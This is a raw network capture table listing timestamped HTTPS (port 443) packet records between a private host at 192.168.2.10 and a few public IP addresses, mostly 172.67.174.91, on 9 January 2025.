Jan 9, 2025 14:56:20.991518974 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.991533995 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.991554976 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:21.143970013 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:21.144032001 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:21.144820929 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:21.144838095 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:30.083270073 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.083306074 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:30.083472013 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.086476088 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.086494923 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:30.575248003 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:30.575344086 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.579318047 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.579323053 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:30.579561949 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:30.633219957 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.688952923 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.689028978 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:30.689034939 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267375946 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267438889 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267466068 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267497063 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.267503977 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267515898 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267538071 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.267604113 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267637014 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267646074 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.267654896 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.267760038 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.267766953 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.271930933 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.271980047 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.271992922 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.312019110 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.355528116 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357688904 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357744932 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.357764959 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357820988 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357851982 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357883930 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357898951 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.357906103 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.357935905 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.358462095 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.358511925 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.358519077 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.358925104 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.358959913 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.358972073 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.358978033 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359016895 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359050035 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359067917 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.359076023 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359095097 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.359816074 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359853983 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359889030 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359903097 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.359910965 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359944105 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.359961033 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.359996080 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.360121012 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.360130072 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.360168934 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.360696077 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.405761957 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.444860935 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448265076 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448302031 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448314905 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.448327065 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448369026 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448410988 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.448419094 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448453903 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.448657990 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448689938 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448730946 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.448736906 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.448776007 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.449228048 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.449259996 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.449274063 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.449280977 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.449306011 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.449363947 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.450753927 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.451997042 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.452011108 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.452042103 CET	50086	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.452049017 CET	443	50086	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.858167887 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.858234882 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:31.858346939 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.858716965 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:31.858730078 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.418190956 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.418263912 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.419682980 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.419688940 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.419950008 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.420682907 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.420697927 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.420753002 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.441175938 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.441217899 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.441494942 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.441797018 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.441812038 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.928049088 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.928121090 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.929425001 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.929433107 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.929709911 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.930599928 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.931427956 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.931479931 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.931657076 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.931687117 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.931782007 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.931811094 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.931915045 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.931943893 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.932060003 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.932085991 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.932236910 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.932262897 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.932271004 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.932399988 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.932431936 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.951879978 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.952030897 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.952073097 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.952079058 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.952089071 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.952100992 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.952135086 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.952259064 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.952287912 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.952321053 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.956382990 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.956506014 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.956532001 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.956552982 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.956588030 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.962316036 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.967957973 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.968025923 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.968121052 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.969769001 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.969789982 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:32.969803095 CET	50088	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:32.969810963 CET	443	50088	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.175031900 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.175107002 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.175183058 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.175331116 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.175339937 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.175354958 CET	50089	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.175359964 CET	443	50089	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.267776012 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.267812014 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.267874956 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.268346071 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.268359900 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.786951065 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.787020922 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.788348913 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.788355112 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.788594961 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:34.796909094 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.796947956 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:34.796955109 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.101814985 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.101886034 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.102010012 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.102549076 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.102571964 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.102585077 CET	50090	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.102591991 CET	443	50090	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.250329971 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.250372887 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.250462055 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.250819921 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.250829935 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.718034029 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.718132973 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.719611883 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.719624043 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.719888926 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:35.721035957 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.721051931 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:35.721101046 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.045150995 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.045219898 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.045329094 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.045360088 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.045372009 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.045380116 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.045387030 CET	50091	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.045391083 CET	443	50091	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.204045057 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.204083920 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.204395056 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.205670118 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.205681086 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.723227024 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.723330021 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.724864960 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.724883080 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.725126982 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:36.725903034 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.725903034 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:36.725920916 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.047442913 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.047511101 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.047631979 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.047667980 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.047739029 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.047739029 CET	50092	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.047749043 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.047756910 CET	443	50092	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.400486946 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:37.400579929 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:37.400640011 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:37.420914888 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:37.421027899 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:37.421076059 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:37.530292988 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:37.530533075 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:37.530570984 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:37.641714096 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.641773939 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:37.641890049 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.642227888 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:37.642244101 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.133907080 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.135127068 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.135127068 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.135149002 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.135370016 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.136178970 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.179374933 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.223123074 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.223162889 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.223347902 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.223371983 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.225058079 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.225085020 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.822740078 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.822809935 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.822860003 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.822998047 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.823008060 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:38.823023081 CET	50093	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:38.823029041 CET	443	50093	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.382460117 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.382497072 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.382585049 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.383002996 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.383016109 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.842995882 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.843130112 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.844821930 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.844829082 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.845066071 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.845932007 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.845932007 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.845963955 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.846240044 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.846271992 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:39.846493006 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:39.846535921 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.450189114 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.450356960 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.450428009 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.450455904 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.450573921 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.450573921 CET	50094	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.450598955 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.450608969 CET	443	50094	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.643289089 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.643302917 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:40.643496037 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.643708944 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:40.643718958 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.311172962 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.311265945 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.312647104 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.312658072 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.313103914 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.314107895 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.314126015 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.314182997 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.799361944 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.799501896 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:41.799662113 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.799662113 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.799662113 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:41.799704075 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:42.109055996 CET	50095	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:42.109071970 CET	443	50095	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.031028032 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.031056881 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.031146049 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.031496048 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.031506062 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.504179955 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.504302979 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.505753994 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.505759954 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.506086111 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.506803036 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.507550001 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.507585049 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.507725954 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.507760048 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.507868052 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.507890940 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.508013964 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.508037090 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.511080980 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.511105061 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.511260033 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.511286020 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.511286974 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.511720896 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.511750937 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.531673908 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.533786058 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.533808947 CET	443	50096	172.67.174.91	192.168.2.10
Jan 9, 2025 14:56:56.533827066 CET	50096	443	192.168.2.10	172.67.174.91
Jan 9, 2025 14:56:56.533839941 CET	50096	443	192.168.2.10	172.67.174.91
